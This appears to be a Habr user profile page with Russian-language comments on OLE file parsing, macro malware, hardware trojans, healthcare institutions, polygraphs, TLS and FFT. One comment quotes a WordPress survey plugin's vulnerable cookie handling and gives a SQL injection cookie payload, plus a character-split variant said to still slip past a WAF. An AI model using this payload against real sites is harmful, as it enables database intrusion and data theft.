Как стать автором
Обновить
27
0

Пользователь

Отправить сообщение
Есть и питоновский пакет OleFile для парсинга CFB/OLE, на основе которого сделаны OleTools и OleDump.
Да, действительно :-) Только там почему-то формат называется CDF.
Про синдром «Not invented here» понравилось, у меня тоже такое ощущение часто бывает, когда Микрософтовские поделки тех времён разбираю :-)
А двухфакторную аутентификацию не делали? С OTP?
Т.е. само эталонное устройство не нужно, предиктор обучен на размеченных фотографиях основных элементов микросхем и способен различить, является ли исследуемый элемент подозрительным или нет.
Т. е. он ему дают фото части любой микросхемы и он определяет «подозрительная» она или нет?
Я правильно понял, что для использования этих методов нам нужно сначала иметь гарантированно «чистое» устройство, что бы потом можно было определять наличие «троянцев» (модификаций) устройствах, которые должны быть точно такими же?
Круто! Очень хотелось бы иметь больше клиник с таким подходом (ориентация на максимальное качества результата, доступное при современном развитии науки и техники). Причём не только стоматологических!
С одной стороны мы живём во время когда с одной стороны есть огромный задел и в науке, и в технике, для того что бы повышать качество медицины (и, соответственно, жизни). С другой стороны многие врачи больше напоминают знахарей, работающих по старинке и по наитию.
Тут проблема в том, что государственные институты кроме неповоротливости (о которой уже писали) имеют и кучу других проблем. Обычно (не знаю как в медицине, думаю что там особенно) это: низкие зарплаты сотрудников и боязнь сотрудником «получить по шапке» по довольно неожиданным поводам (часто к качеству работы отношения не имеющим). И то и то негативно сказывается на качестве работы.

Задача бизнеса — получать прибыль (это нормально), а задача государственных учреждений — получать хорошие оценки от вышестоящего учреждения (это в целом тоже нормально). И там и там получение действительно качественного результата и отсутствие скрытых негативных последствий — дело совести конкретных исполнителей и организации, мало зависит от формы собственности.

Если убрать «фактор совести» то коммерция будет стараться сделать клиенту «хорошо сейчас» (комфортнее, произвести эффект), а «хорошо потом» (что зуб не заболит через год) не так важно. Госов ни «хорошо сейчас», ни «хорошо потом» на прямую не волнует (важен бумажный результат).

По правилам и гостам, с соответствующей обработкой результатов и контролем.

В гос. учреждениях после доклада «на верх» об успехах (а доложить хочется пораньше), показывать плохие результаты очень не хочется (см. выше про получение «по шапке»), и в таких случаях соблазн статистику поправить на бумаге гораздо больше, чем в коммерции (где он тоже может быть). Так что про «соответствующую обработку результатов» как раз комерсы могут быть предпочтительней.

Так же про «контроль»: гос. учреждение подконтрольно другому гос. учреждению, что может приводить к конфликтам интересов (например при реализации запущенных сильно «сверху» программ). При исследованиях в коммерческой клинике есть разделение: проводят исследование коммерсы, а контролируют госы, что уменьшает вероятность конфликта интересов.
Да, если все макросы разрешены, то сразу при открытии документа.
Там есть ещё другие события (например закрытие документа), но вредоносы чаще всего (не всегда) стартуют по открытию.
P.S. А, если не секрет, вы макросы свои используете (и, если да, то как часто дописываете), или из полученных от кото-то ещё документах тоже? Просто в MSOffice есть средства подписывания макросов, интересно, реально ли это использовать в реальности.
Вы сейчас про этот файл (про который я писал), или про файл из статьи 2017 года, откуда картинка?
В принципе да, артефактов в файле, про который я писал, много. Но кроме строк с SQL, я других совпадений с репозиторием не нашёл (может плохо искал).
P.S. И наличие кода из его репозитория в общем случае не говорит о том, что это он автор вредоноса. Возможно создатели вредоноса просто взяли его код с того же гита (типа Stack Overflow driven development).
Ну кусок кода отсюда там вставлен, видимо, вообще для «отвлечения глаз», и какого-либо смысла не несёт.
Ну если хочется увидеть указания на ошибки в чужом коде — можно посмотреть Гитлаб какого-нибудь OpenSource проекта, issue с пометкой bug. Или на поискать на Хабре «PVS Studio», они периодически публикуют результаты поиска ошибок в коде с подробным разбором.
Публично доступной информации на эту тему очень много. Это ПО — не удачный пример для обучения и разбора ошибок.
Быстро просмотрел github, ничего похожего не нашёл. Про какую его часть вы говорите?
Ну принцип-то в целом правильный. Только в этом случае речь идёт про вредоносное ПО и помогать его разработчикам я не хочу.
Я эксплуатировал через WAF таким образом (сейчас тоже работает).
Если посмотреть код уязвимого плагина, то там кука, в которую производится инъекция, обрабатывается так:
...
$survey_viewed = json_decode( stripslashes( $_COOKIE[ 'wp_sap' ] ) );
...
$sv = implode( $survey_viewed );
...

И дальше в SQL запросе используется $sv. В оригинале там в куку записывается список из одной строки, но если ему дать список из нескольких строк — то он их склеит в одну. Поэтому вместо такой куки:
["242178939')) UNION SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]

Можно давать такую, в которой сигнатуры уже остуствуют:
["242178939')) ","U","N","I","O","N"," ","S","E","L","E","C","T"," ","1",",","2",",","3",",","4",",","5",",","6",",","7",",","8",",","9",",","@","@","v","e","r","s","i","o","n",",","1","1#"]

Да, и кстати, «OR 1=2» там, естественно, лишний (привычка писать «OR 1=1»? :-D ).
Хотя этот пунктик HR на собеседовании в одной конторе озвучивал, а в другой конторе просто отправили через месяц работы. Я вот думаю, если бы я не прошел полиграф, меня бы уволили или нет?
От полиграфа всегда можно отказаться (даже в рамках расследования уголовного дела). Думаю, что если в договоре про полиграф ничего нет, то в случае увольнения работника по причине отказа проходить полиграф, работник при желании может увольнение оспорить.
Лучше делать по-другому: в своём приложении используем стандартную реализацию TLS, но проверяем сертификат по встроенному в приложение CA (своему собственному. Речь ведь идёт только о случае, когда сервер и ПО контролируются одним субъектом?) Все API к TLS, которые я знаю, это прекрасно поддерживают.
Реализовывать самому не стоит по двум причинам:
— шансы накосячить в реализации довольно большие (или очень большие)
— трудоёмкость самостоятельной реализации намного выше.
Статья вроде для тех, кто вообще не в теме, при этом по тексту откуда-то появляются термины, скорее всего не знакомые читателям, без какого-либо объяснения.
TLS… основан на SSL
А что такое SSL? Это основа TLS? Ну и слово «основан» тут ИМХО не подходит.

Вы используете слово «сертификат» никак не объясняя что это такое и как это вообще связано с ассиметричной криптографией.
В этом протоколе [TLS?] шифровать данные можно двумя способами: используя Криптосистему с Открытым Ключом или Симметричные Криптосистемы.
чего-то я не помню, что бы TLS предоставлял такой выбор. Там всегда используется и то, и то.
Цифровые сертификаты бывают двух категорий. Доверенные сертификаты подписываются Центром Сертификации (Certificate Authority, кратко — CA), в то время как недоверенные сертификаты — самоподписанные.
Самоподписанные могут быть доверенными (например сами CA сертификаты), а подписанные CA — недоверенными (подписать можно недоверенным CA сертификатом).
И много других неточностей/недосказанностей и вообще перлов типа «Криптосистема с открытым ключом, как реализация, совершенней симметричных криптосистем.»
А чем FFT не устраивает? Медленно считается? Если нужна только одна частота (т.е. одна точка на дискретном спектре), то можно считать дискретное преобразование Фурье для одной частоты. Сложность FFT — O(n * log (n)), а расчёта одной точки спектра «в лоб» — O(n), т.е. для очень узких фильтров (при больших n) будет в несколько раз быстрей.
Но учтите, что чем точней вам надо получить частоту, тем более длинную реализацию сигнала (окно) надо брать. Это принципиальное ограничение, не важно используете FFT (хотя ресурсов на расчёт FFT тоже надо больше), «железные» фильтры или ещё что.
Так что узкополосный сигнал может быть не самым удачным выбором, если надо измерять время. Как написал Refridgerator, лучше мощный импульсный сигнал или какой-то более сложный с широким спектром (ЛЧМ или ещё что).
Мануал к Ubuntu про генерацию сертификатов для SSH (не X.509).

Информация

В рейтинге
Не участвует
Зарегистрирован
Активность